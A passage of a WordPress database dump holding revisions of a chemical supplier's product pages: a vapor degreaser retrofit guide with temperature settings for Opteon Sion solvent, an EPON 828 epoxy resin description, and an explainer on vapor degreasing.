recommended temperatures. Turn on the heaters and pumps in accordance with the equipment manufacturer’s recommended procedure. Set the condensing coil temperatures in accordance with the equipment manufacturer’s recommendations. Adjust the boil sump and alarm temperatures in accordance with the equipment manufacturer’s recommendations; Chemours recommended settings are summarized below and in Table 1.</li>\r\n</ol>\r\n<strong>Cleaning optimization may require slight adjustments to the recommended initial settings, depending upon the model of vapor degreaser employed.</strong>\r\n<ul>\r\n 	<li>Boil Sump T. Set to 5 °C (41 °F) above the boiling point of the solvent chosen.</li>\r\n 	<li>High Solvent T Alarm. Set to 10 °C (50 °F) above the boiling point of the solvent chosen.</li>\r\n 	<li>High Vapor T/Coolant Failure Alarm. Set to 5 °C (41 °F) below the boiling point of the solvent chosen.</li>\r\n 	<li>Ultrasonic Tank High T Alarm. Set to not more than 90% of boiling point of the solvent chosen.</li>\r\n</ul>\r\nTable 1. Recommended Vapor Degreaser Settings for Opteon™ Sion\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Setting</td>\r\n<td style="text-align: center;" width="206">Opteon™ Sion</td>\r\n</tr>\r\n<tr>\r\n<td>Solvent Boiling Point (°C [°F])</td>\r\n<td style="text-align: center;">47 (117)</td>\r\n</tr>\r\n<tr>\r\n<td>Boil Sump T (°C [°F])</td>\r\n<td style="text-align: center;">52 (126)</td>\r\n</tr>\r\n<tr>\r\n<td>High Solvent T Alarm (°C [°F])</td>\r\n<td style="text-align: center;">57 (135)</td>\r\n</tr>\r\n<tr>\r\n<td>Coolant Failure Alarm (°C [°F])</td>\r\n<td style="text-align: center;">42 (108)</td>\r\n</tr>\r\n<tr>\r\n<td>Ultrasonic Tank High T Alarm (°C [°F])</td>\r\n<td style="text-align: center;">43 (109)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Specialty Solvent" ]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">For more information regarding Opteon™ Sion please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">For more information regarding vapor degreasing, please click here.</a>', 'Retrofit Guideline for Opteon™ Sion - Specialty Solvent', '', 'inherit', 'closed', 'closed', '', '2618-revision-v1', '', '', '2016-10-13 15:23:46', '2016-10-13 15:23:46', '', 2618, 'https://www.miller-stephenson.com/2618-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2621, 2, '2016-10-13 15:24:59', '2016-10-13 15:24:59', '<h4><strong>Introduction to <a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a> Specialty Solvent</strong></h4>\n<p>Opteon™ Sion specialty solvent is suitable to replace n-propyl bromide in applications demanding maximum cleaning power, including defluxing; oil, grease, and wax removal; and precision cleaning applications.</p>\n<p>Opteon™ Sion specialty solvent offers an excellent balance between cleaning performance, environmental impact, and safety in use:</p>\n<ul>\n<li>Excellent solvency power (KB value = 100)</li>\n<li>Superior cleaning performance</li>\n<li>Fast drying, increasing productivity</li>\n<li>Compatible with most metals, plastics, and elastomers</li>\n<li>Nonflammable</li>\n<li>Low toxicity</li>\n<li>Zero ozone depletion potential (ODP)</li>\n<li>Low global warming potential (GWP)</li>\n<li>Suitable for use with ultrasonics</li>\n<li>Existing equipment can be used with no or minor modification</li>\n</ul>\n<h4><strong><span style="color: #555555; font-size: 14.4px;">Retrofit Guideline Opteo</span><span style="color: #555555; font-size: 14.4px;">n</span><span style="color: #555555; font-size: 14.4px;">™ S</span><span style="color: #555555; font-size: 14.4px;">ion - Specialty Solvent</span></strong></h4>\n<h4><span style="color: #555555; font-size: 14.4px;">The following provides a summary of the basic retrofit steps for Opteon™ Sion; detailed discussion of each step is provided in this bulletin.</span></h4>\n<ol>\n<li>Drain n-propyl bromide from the vapor degreaser system.</li>\n<li>Replace filters.</li>\n<li>Replace desiccant bags.</li>\n<li>Wipe down tank and ensure removal of any residues.</li>\n<li>Flush the liquid lines with a small amount of Opteon™ Sion.</li>\n<li>Charge tank with recommended quantity of Opteon™ Sion.</li>\n<li>Turn on heaters and pump. Adjust heater, condensing coils, and alarm set points to the recommended temperatures.</li>\n</ol>\n<p><strong>RETROFIT IS COMPLETE!</strong></p>\n<h4><strong>General Retrofit Information</strong></h4>\n<p>System Modifications</p>\n<p>In the vast majority of cases, Opteon™ Sion will function as a drop-in for n-propyl bromide, and no modifications to existing equipment are required. Special cases where minor equipment modifications may be required are discussed below.</p>\n<p>Material Compatibility</p>\n<p>Opteon™ Sion is characterized by good compatibility with a wide selection of metals, including stainless steel, copper, brass, and aluminum. Opteon™ Sion is also compatible with a wide selection of plastics and elastomers, including Teflon™ PTFE, FEP, PFA, polyethylene, polypropylene, nylon, PVDF, PPS, ECTFE, and DuPont™ Kalrez® perfluoroelastomer. Examples of incompatible plastics include acrylics, ABS, polycarbonate, and polystyrene. Most elastomers including Viton™, natural rubber, EPDM, silicone, and CSPE show reversible swelling when exposed to Opteon™ Sion. Teflon™ or Teflon™ encapsulated gaskets and O-ring seals are recommended for diaphragm pumps. Individual plastic and elastomeric formulations can vary with the manufacturer; therefore, the best assurance of material compatibility can be attained via testing under conditions expected during normal operation. Contact your local technical representative for specific material compatibility concerns.</p>\n<p>Flammability</p>\n<p>Opteon™ Sion exhibits no closed cup or open cup flash point and is classified as a nonflammable liquid. The products are volatile; if allowed to evaporate and mix with air, flammable mixtures can be produced.</p>\n<h4><strong>Detailed Retrofit Procedure</strong></h4>\n<ol>\n<li><strong>Drain n-propyl bromide from the vapor degreaser tank.</strong> The existing charge of n-propyl bromide should be completely removed from the system and collected in a suitable vessel for recycle or disposal in accordance with local requirements. Ensure that n-propyl bromide has been drained from all tanks, liquid lines, water separators, filter holders, and any other system components that are in contact with n-propyl bromide.</li>\n<li><strong>Replace filters.</strong> Change the filter during the retrofit. Standard filters employing polypropylene or PTFE media are acceptable</li>\n<li><strong>Replace desiccant bags.</strong> Change the desiccant bags during the retrofit. Type 3A molecular sieves are recommended for use in the desiccant bags; suitable desiccant bag materials include cotton. DuPont™ Tyvek® bags are not recommended.</li>\n<li><strong>Wipe down tank, and ensure removal of any residues.</strong> The <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank should be thoroughly cleaned to ensure the removal of any residual n-propyl bromide and any residues present in the tank.</li>\n<li><strong>Flush the liquid lines with a small amount of Opteon™ Sion.</strong> Charge the <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank with a small amount of Opteon™ Sion, and flush the liquid lines; do not allow the pump to run dry during the line flushing procedure.</li>\n<li><strong>Charge tank with recommended quantity of Opteon™ Sion.</strong> Charge the vapor degreaser tank to the liquid level recommended by the manufacturer.</li>\n<li><strong>Turn on heaters and pump.</strong> Adjust heater, condensing coils, and alarm set points to the recommended temperatures. Turn on the heaters and pumps in accordance with the equipment manufacturer’s recommended procedure. Set the condensing coil temperatures in accordance with the equipment manufacturer’s recommendations. Adjust the boil sump and alarm temperatures in accordance with the equipment manufacturer’s recommendations; Chemours recommended settings are summarized below and in Table 1.</li>\n</ol>\n<p><strong>Cleaning optimization may require slight adjustments to the recommended initial settings, depending upon the model of vapor degreaser employed.</strong></p>\n<ul>\n<li>Boil Sump T. Set to 5 °C (41 °F) above the boiling point of the solvent chosen.</li>\n<li>High Solvent T Alarm. Set to 10 °C (50 °F) above the boiling point of the solvent chosen.</li>\n<li>High Vapor T/Coolant Failure Alarm. Set to 5 °C (41 °F) below the boiling point of the solvent chosen.</li>\n<li>Ultrasonic Tank High T Alarm. Set to not more than 90% of boiling point of the solvent chosen.</li>\n</ul>\n<p>Table 1. Recommended Vapor Degreaser Settings for Opteon™ Sion</p>\n<table width="456">\n<tbody>\n<tr>\n<td width="250">Setting</td>\n<td style="text-align: center;" width="206">Opteon™ Sion</td>\n</tr>\n<tr>\n<td>Solvent Boiling Point (°C [°F])</td>\n<td style="text-align: center;">47 (117)</td>\n</tr>\n<tr>\n<td>Boil Sump T (°C [°F])</td>\n<td style="text-align: center;">52 (126)</td>\n</tr>\n<tr>\n<td>High Solvent T Alarm (°C [°F])</td>\n<td style="text-align: center;">57 (135)</td>\n</tr>\n<tr>\n<td>Coolant Failure Alarm (°C [°F])</td>\n<td style="text-align: center;">42 (108)</td>\n</tr>\n<tr>\n<td>Ultrasonic Tank High T Alarm (°C [°F])</td>\n<td style="text-align: center;">43 (109)</td>\n</tr>\n</tbody>\n</table>\n[ux_product_categories ids="231" number="10"]\n\n<p><a href="https://www.miller-stephenson.com/product/sion/">For more information regarding Opteon™ Sion please click here.</a></p>\n<p><a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">For more information regarding vapor degreasing, please click here.</a></p>', 'Retrofit Guideline for Opteon™ Sion - Specialty Solvent', '', 'inherit', 'closed', 'closed', '', '2618-revision-v1', '', '', '2016-10-13 15:24:59', '2016-10-13 15:24:59', '', 2618, 'https://www.miller-stephenson.com/2618-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2622, 2, '2016-10-13 15:37:49', '2016-10-13 15:37:49', '', 'liquid-density-opteon-suprion', '', 'inherit', 'closed', 'closed', '', 'liquid-density-opteon-suprion', '', '', '2016-10-13 15:37:49', '2016-10-13 15:37:49', '', 1344, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/liquid-density-opteon-suprion.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2623, 2, '2016-10-13 15:39:14', '2016-10-13 15:39:14', '', 'liquid-viscosity-opteon-suprion', '', 'inherit', 'closed', 'closed', '', 'liquid-viscosity-opteon-suprion', '', '', '2016-10-13 15:39:14', '2016-10-13 15:39:14', '', 1344, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/liquid-viscosity-opteon-suprion.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2624, 2, '2016-10-13 15:42:43', '2016-10-13 15:42:43', '<h4><strong>Introduction to <a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a> Specialty Solvent</strong></h4>\r\nOpteon™ Sion specialty solvent is suitable to replace n-propyl bromide in applications demanding maximum cleaning power, including defluxing; oil, grease, and wax removal; and precision cleaning applications.\r\n\r\nOpteon™ Sion specialty solvent offers an excellent balance between cleaning performance, environmental impact, and safety in use:\r\n<ul>\r\n 	<li>Excellent solvency power (KB value = 100)</li>\r\n 	<li>Superior cleaning performance</li>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n 	<li>Suitable for use with ultrasonics</li>\r\n 	<li>Existing equipment can be used with no or minor modification</li>\r\n</ul>\r\n<h4><strong><span style="color: #555555; font-size: 14.4px;">Retrofit Guideline Opteo</span><span style="color: #555555; font-size: 14.4px;">n</span><span style="color: #555555; font-size: 14.4px;">™ S</span><span style="color: #555555; font-size: 14.4px;">ion - Specialty Solvent</span></strong></h4>\r\n<h4><span style="color: #555555; font-size: 14.4px;">The following provides a summary of the basic retrofit steps for Opteon™ Sion; detailed discussion of each step is provided in this bulletin.</span></h4>\r\n<ol>\r\n 	<li>Drain n-propyl bromide from the vapor degreaser system.</li>\r\n 	<li>Replace filters.</li>\r\n 	<li>Replace desiccant bags.</li>\r\n 	<li>Wipe down tank and ensure removal of any residues.</li>\r\n 	<li>Flush the liquid lines with a small amount of Opteon™ Sion.</li>\r\n 	<li>Charge tank with recommended quantity of Opteon™ Sion.</li>\r\n 	<li>Turn on heaters and pump. Adjust heater, condensing coils, and alarm set points to the recommended temperatures.</li>\r\n</ol>\r\n<strong>RETROFIT IS COMPLETE!</strong>\r\n<h4><strong>General Retrofit Information</strong></h4>\r\nSystem Modifications\r\n\r\nIn the vast majority of cases, Opteon™ Sion will function as a drop-in for n-propyl bromide, and no modifications to existing equipment are required. Special cases where minor equipment modifications may be required are discussed below.\r\n\r\nMaterial Compatibility\r\n\r\nOpteon™ Sion is characterized by good compatibility with a wide selection of metals, including stainless steel, copper, brass, and aluminum. Opteon™ Sion is also compatible with a wide selection of plastics and elastomers, including Teflon™ PTFE, FEP, PFA, polyethylene, polypropylene, nylon, PVDF, PPS, ECTFE, and DuPont™ Kalrez® perfluoroelastomer. Examples of incompatible plastics include acrylics, ABS, polycarbonate, and polystyrene. Most elastomers including Viton™, natural rubber, EPDM, silicone, and CSPE show reversible swelling when exposed to Opteon™ Sion. Teflon™ or Teflon™ encapsulated gaskets and O-ring seals are recommended for diaphragm pumps. Individual plastic and elastomeric formulations can vary with the manufacturer; therefore, the best assurance of material compatibility can be attained via testing under conditions expected during normal operation. Contact your local technical representative for specific material compatibility concerns.\r\n\r\nFlammability\r\n\r\nOpteon™ Sion exhibits no closed cup or open cup flash point and is classified as a nonflammable liquid. The products are volatile; if allowed to evaporate and mix with air, flammable mixtures can be produced.\r\n<h4><strong>Detailed Retrofit Procedure</strong></h4>\r\n<ol>\r\n 	<li><strong>Drain n-propyl bromide from the vapor degreaser tank.</strong> The existing charge of n-propyl bromide should be completely removed from the system and collected in a suitable vessel for recycle or disposal in accordance with local requirements. Ensure that n-propyl bromide has been drained from all tanks, liquid lines, water separators, filter holders, and any other system components that are in contact with n-propyl bromide.</li>\r\n 	<li><strong>Replace filters.</strong> Change the filter during the retrofit. Standard filters employing polypropylene or PTFE media are acceptable</li>\r\n 	<li><strong>Replace desiccant bags.</strong> Change the desiccant bags during the retrofit. Type 3A molecular sieves are recommended for use in the desiccant bags; suitable desiccant bag materials include cotton. DuPont™ Tyvek® bags are not recommended.</li>\r\n 	<li><strong>Wipe down tank, and ensure removal of any residues.</strong> The <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank should be thoroughly cleaned to ensure the removal of any residual n-propyl bromide and any residues present in the tank.</li>\r\n 	<li><strong>Flush the liquid lines with a small amount of Opteon™ Sion.</strong> Charge the <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank with a small amount of Opteon™ Sion, and flush the liquid lines; do not allow the pump to run dry during the line flushing procedure.</li>\r\n 	<li><strong>Charge tank with recommended quantity of Opteon™ Sion.</strong> Charge the vapor degreaser tank to the liquid level recommended by the manufacturer.</li>\r\n 	<li><strong>Turn on heaters and pump.</strong> Adjust heater, condensing coils, and alarm set points to the recommended temperatures. Turn on the heaters and pumps in accordance with the equipment manufacturer’s recommended procedure. Set the condensing coil temperatures in accordance with the equipment manufacturer’s recommendations. Adjust the boil sump and alarm temperatures in accordance with the equipment manufacturer’s recommendations; Chemours recommended settings are summarized below and in Table 1.</li>\r\n</ol>\r\n<strong>Cleaning optimization may require slight adjustments to the recommended initial settings, depending upon the model of vapor degreaser employed.</strong>\r\n<ul>\r\n 	<li>Boil Sump T. Set to 5 °C (41 °F) above the boiling point of the solvent chosen.</li>\r\n 	<li>High Solvent T Alarm. Set to 10 °C (50 °F) above the boiling point of the solvent chosen.</li>\r\n 	<li>High Vapor T/Coolant Failure Alarm. Set to 5 °C (41 °F) below the boiling point of the solvent chosen.</li>\r\n 	<li>Ultrasonic Tank High T Alarm. Set to not more than 90% of boiling point of the solvent chosen.</li>\r\n</ul>\r\nTable 1. Recommended Vapor Degreaser Settings for Opteon™ Sion\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Setting</td>\r\n<td style="text-align: center;" width="206">Opteon™ Sion</td>\r\n</tr>\r\n<tr>\r\n<td>Solvent Boiling Point (°C [°F])</td>\r\n<td style="text-align: center;">47 (117)</td>\r\n</tr>\r\n<tr>\r\n<td>Boil Sump T (°C [°F])</td>\r\n<td style="text-align: center;">52 (126)</td>\r\n</tr>\r\n<tr>\r\n<td>High Solvent T Alarm (°C [°F])</td>\r\n<td style="text-align: center;">57 (135)</td>\r\n</tr>\r\n<tr>\r\n<td>Coolant Failure Alarm (°C [°F])</td>\r\n<td style="text-align: center;">42 (108)</td>\r\n</tr>\r\n<tr>\r\n<td>Ultrasonic Tank High T Alarm (°C [°F])</td>\r\n<td style="text-align: center;">43 (109)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">For more information regarding Opteon™ Sion please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">For more information regarding vapor degreasing, please click here.</a>', 'Retrofit Guideline for Opteon™ Sion - Specialty Solvent', '', 'inherit', 'closed', 'closed', '', '2618-revision-v1', '', '', '2016-10-13 15:42:43', '2016-10-13 15:42:43', '', 2618, 'https://www.miller-stephenson.com/2618-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2625, 3, '2016-11-23 19:36:37', '2016-11-23 19:36:37', 'EPON 828 resin is an undiluted clear difunctional bisphenol A/epichlorohydrin derived liquid epoxy resin. When cross-linked or hardened with appropriate curing agents, very good mechanical, adhesive, dielectric and chemical resistance properties are obtained. Because of this versatility, EPON Resin 828 has become a standard epoxy resin used in formulation, fabrication and fusion technology. Miller-Stephenson is certified EPON 828 supplier and EPON 828 benefits include:\n<ul>\n 	<li>Fiber reinforced pipes, tanks and composites</li>\n 	<li>Tooling, casting and molding compounds</li>\n 	<li>Construction, electrical and aerospace adhesives</li>\n 	<li>High solids/low VOC maintenance and marine coatings</li>\n 	<li>Electrical encapsulations and laminates</li>\n 	<li>Chemical resistant tank linings, flooring and grouts</li>\n 	<li>Base resin for epoxy fusion technology</li>\n</ul>\nEPON™ Difunctional Liquid Epoxy Resin are the most important products sold in the epoxy resin market, and one of the foundations of Hexion. The basis of the product line is EPON Resin 828, which is a liquid resin also described as diglycidyl ether of Bisphenol A. This key resin is complemented in the range by EPON Resin 862, the diglycidyl ether of Bisphenol F, and a full series of modified liquid epoxy resins, epoxy resin blends and purified epoxy resins.\n\n<strong>General Information</strong>\n\nThe low viscosity and cure properties of EPON Resin 828 allow its use under various application and fabrication techniques including:\n<table border="1" cellspacing="0" cellpadding="0">\n<tbody>\n<tr>\n<td valign="top" width="271">\n<ul type="disc">\n 	<li>Spraying and brushing</li>\n</ul>\n</td>\n<td valign="top" width="271">\n<ul type="disc">\n 	<li>Pultrusion</li>\n</ul>\n</td>\n</tr>\n<tr>\n<td valign="top" width="271">\n<ul type="disc">\n 	<li>Filament winding</li>\n</ul>\n</td>\n<td valign="top" width="271">\n<ul type="disc">\n 	<li>Casting</li>\n</ul>\n</td>\n</tr>\n<tr>\n<td valign="top" width="271">\n<ul type="disc">\n 	<li>Pressure laminating</li>\n</ul>\n</td>\n<td valign="top" width="271">\n<ul type="disc">\n 	<li>Molding</li>\n</ul>\n</td>\n</tr>\n<tr>\n<td valign="top" width="271">\n<ul type="disc">\n 	<li>Vacuum bag laminating</li>\n</ul>\n</td>\n<td valign="top" width="271">\n<ul type="disc">\n 	<li>Toweling</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n<strong>Application</strong>\n\nEPON liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing. Cured EPON resins are generally regarded as being high strength materials, since many commonly used systems provide tensile strengths greater than 10,000 psi and modulus values greater than 400,000 psi. One of the most widely recognized applications of cured EPON Resin 828 is strong adhesion to a broad range of substrates. Such systems exhibit shear strength of up to 6,000 psi (41 Mpa). One factor which contributes to this property is the low shrinkage shown by these systems during cure. Compared to other polymers, epoxy resins have low internal stresses resulting in strong and durable finished products.\n\nMiller-Stephenson is an Epon 828 Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'EPON™ 828', 'EPON™ Resin 828 is an undiluted clear difunctional bisphenol A/epichlorohydrin derived liquid epoxy resin. When cross-linked or hardened with appropriate curing agents, very good mechanical, adhesive, dielectric and chemical resistance properties are obtained. Because of this versatility, EPON Resin 828 has become a standard epoxy resin used in formulation, fabrication and fusion technology. Benefits include:\n<ul>\n 	<li>Fiber reinforced pipes, tanks and composites</li>\n 	<li>Tooling, casting and molding compounds</li>\n 	<li>Construction, electrical and aerospace adhesives</li>\n 	<li>High solids/low VOC maintenance and marine coatings</li>\n 	<li>Electrical encapsulations and laminates</li>\n 	<li>Chemical resistant tank linings, flooring and grouts</li>\n 	<li>Base resin for epoxy fusion technology</li>\n</ul>', 'inherit', 'closed', 'closed', '', '877-autosave-v1', '', '', '2016-11-23 19:36:37', '2016-11-23 19:36:37', '', 877, 'https://www.miller-stephenson.com/877-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2626, 3, '2016-10-13 16:27:56', '2016-10-13 16:27:56', '<h4><strong>Introduction to <a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a> Specialty Solvent</strong></h4>\nOpteon™ Sion specialty solvent is suitable to replace n-propyl bromide (nPB) and trichloroethylene (TCE) in applications demanding maximum cleaning power, including defluxing; oil, grease, and wax removal; and precision cleaning applications.\n\nOpteon™ Sion specialty solvent offers an excellent balance between cleaning performance, environmental impact, and safety in use:\n<ul>\n 	<li>Excellent solvency power (KB value = 100)</li>\n 	<li>Superior cleaning performance</li>\n 	<li>Fast drying, increasing productivity</li>\n 	<li>Compatible with most metals, plastics, and elastomers</li>\n 	<li>Nonflammable</li>\n 	<li>Low toxicity</li>\n 	<li>Zero ozone depletion potential (ODP)</li>\n 	<li>Low global warming potential (GWP)</li>\n 	<li>Suitable for use with ultrasonics</li>\n 	<li>Existing equipment can be used with no or minor modification</li>\n</ul>\n<h4><strong><span style="color: #555555; font-size: 14.4px;">Retrofit Guideline Opteo</span><span style="color: #555555; font-size: 14.4px;">n</span><span style="color: #555555; font-size: 14.4px;">™ S</span><span style="color: #555555; font-size: 14.4px;">ion - Specialty Solvent</span></strong></h4>\n<h4><span style="color: #555555; font-size: 14.4px;">The following provides a summary of the basic retrofit steps for Opteon™ Sion; detailed discussion of each step is provided in this bulletin.</span></h4>\n<ol>\n 	<li>Drain current solvent from the vapor degreaser system.</li>\n 	<li>Replace filters.</li>\n 	<li>Replace desiccant bags.</li>\n 	<li>Wipe down tank and ensure removal of any residues.</li>\n 	<li>Flush the liquid lines with a small amount of Opteon™ Sion.</li>\n 	<li>Charge tank with recommended quantity of Opteon™ Sion.</li>\n 	<li>Turn on heaters and pump. Adjust heater, condensing coils, and alarm set points to the recommended temperatures.</li>\n</ol>\n<strong>RETROFIT IS COMPLETE!</strong>\n<h4><strong>General Retrofit Information</strong></h4>\nSystem Modifications\n\nIn the vast majority of cases, Opteon™ Sion will function as a drop-in for n-propyl bromide, and no modifications to existing equipment are required. Special cases where minor equipment modifications may be required are discussed below.\n\nMaterial Compatibility\n\nOpteon™ Sion is characterized by good compatibility with a wide selection of metals, including stainless steel, copper, brass, and aluminum. Opteon™ Sion is also compatible with a wide selection of plastics and elastomers, including Teflon™ PTFE, FEP, PFA, polyethylene, polypropylene, nylon, PVDF, PPS, ECTFE, and DuPont™ Kalrez® perfluoroelastomer. Examples of incompatible plastics include acrylics, ABS, polycarbonate, and polystyrene. Most elastomers including Viton™, natural rubber, EPDM, silicone, and CSPE show reversible swelling when exposed to Opteon™ Sion. Teflon™ or Teflon™ encapsulated gaskets and O-ring seals are recommended for diaphragm pumps. Individual plastic and elastomeric formulations can vary with the manufacturer; therefore, the best assurance of material compatibility can be attained via testing under conditions expected during normal operation. Contact your local technical representative for specific material compatibility concerns.\n\nFlammability\n\nOpteon™ Sion exhibits no closed cup or open cup flash point and is classified as a nonflammable liquid. The products are volatile; if allowed to evaporate and mix with air, flammable mixtures can be produced.\n<h4><strong>Detailed Retrofit Procedure</strong></h4>\n<ol>\n 	<li><strong>Drain n-propyl bromide from the vapor degreaser tank.</strong> The existing charge of n-propyl bromide should be completely removed from the system and collected in a suitable vessel for recycle or disposal in accordance with local requirements. Ensure that n-propyl bromide has been drained from all tanks, liquid lines, water separators, filter holders, and any other system components that are in contact with n-propyl bromide.</li>\n 	<li><strong>Replace filters.</strong> Change the filter during the retrofit. Standard filters employing polypropylene or PTFE media are acceptable</li>\n 	<li><strong>Replace desiccant bags.</strong> Change the desiccant bags during the retrofit. Type 3A molecular sieves are recommended for use in the desiccant bags; suitable desiccant bag materials include cotton. DuPont™ Tyvek® bags are not recommended.</li>\n 	<li><strong>Wipe down tank, and ensure removal of any residues.</strong> The <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank should be thoroughly cleaned to ensure the removal of any residual n-propyl bromide and any residues present in the tank.</li>\n 	<li><strong>Flush the liquid lines with a small amount of Opteon™ Sion.</strong> Charge the <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank with a small amount of Opteon™ Sion, and flush the liquid lines; do not allow the pump to run dry during the line flushing procedure.</li>\n 	<li><strong>Charge tank with recommended quantity of Opteon™ Sion.</strong> Charge the vapor degreaser tank to the liquid level recommended by the manufacturer.</li>\n 	<li><strong>Turn on heaters and pump.</strong> Adjust heater, condensing coils, and alarm set points to the recommended temperatures. Turn on the heaters and pumps in accordance with the equipment manufacturer’s recommended procedure. Set the condensing coil temperatures in accordance with the equipment manufacturer’s recommendations. Adjust the boil sump and alarm temperatures in accordance with the equipment manufacturer’s recommendations; Chemours recommended settings are summarized below and in Table 1.</li>\n</ol>\n<strong>Cleaning optimization may require slight adjustments to the recommended initial settings, depending upon the model of vapor degreaser employed.</strong>\n<ul>\n 	<li>Boil Sump T. Set to 5 °C (41 °F) above the boiling point of the solvent chosen.</li>\n 	<li>High Solvent T Alarm. Set to 10 °C (50 °F) above the boiling point of the solvent chosen.</li>\n 	<li>High Vapor T/Coolant Failure Alarm. Set to 5 °C (41 °F) below the boiling point of the solvent chosen.</li>\n 	<li>Ultrasonic Tank High T Alarm. Set to not more than 90% of boiling point of the solvent chosen.</li>\n</ul>\nTable 1. Recommended Vapor Degreaser Settings for Opteon™ Sion\n<table width="456">\n<tbody>\n<tr>\n<td width="250">Setting</td>\n<td style="text-align: center;" width="206">Opteon™ Sion</td>\n</tr>\n<tr>\n<td>Solvent Boiling Point (°C [°F])</td>\n<td style="text-align: center;">47 (117)</td>\n</tr>\n<tr>\n<td>Boil Sump T (°C [°F])</td>\n<td style="text-align: center;">52 (126)</td>\n</tr>\n<tr>\n<td>High Solvent T Alarm (°C [°F])</td>\n<td style="text-align: center;">57 (135)</td>\n</tr>\n<tr>\n<td>Coolant Failure Alarm (°C [°F])</td>\n<td style="text-align: center;">42 (108)</td>\n</tr>\n<tr>\n<td>Ultrasonic Tank High T Alarm (°C [°F])</td>\n<td style="text-align: center;">43 (109)</td>\n</tr>\n</tbody>\n</table>\n[ux_product_categories ids="231" number="10"]\n\n<a href="https://www.miller-stephenson.com/product/sion/">For more information regarding Opteon™ Sion please click here.</a>\n\n<a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">For more information regarding vapor degreasing, please click here.</a>', 'Retrofit Guideline for Opteon™ Sion - Specialty Solvent', '', 'inherit', 'closed', 'closed', '', '2618-autosave-v1', '', '', '2016-10-13 16:27:56', '2016-10-13 16:27:56', '', 2618, 'https://www.miller-stephenson.com/2618-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2627, 69, '2016-10-13 16:51:45', '2016-10-13 16:51:45', '', '', '', 'publish', 'closed', 'closed', '', '2627', '', '', '2016-10-13 16:51:46', '2016-10-13 16:51:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/2627/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2628, 3, '2016-10-13 17:24:50', '2016-10-13 17:24:50', '<h1><a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a> - Vapor Degreasing Solvent</h1>\r\n<h4><strong>What is Vapor Degreasing?</strong></h4>\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities. Opteon™ Sion Vapor Degreasing Solvent is great for removing soils and greases from metal parts.\r\n<h4><strong>What types of industries use vapor degreasing, and where is it used?</strong></h4>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<h4><strong>What problems do manufacturers face when it comes to vapor degreasing?</strong></h4>\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n<h4><strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong></h4>\r\nOpteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide and 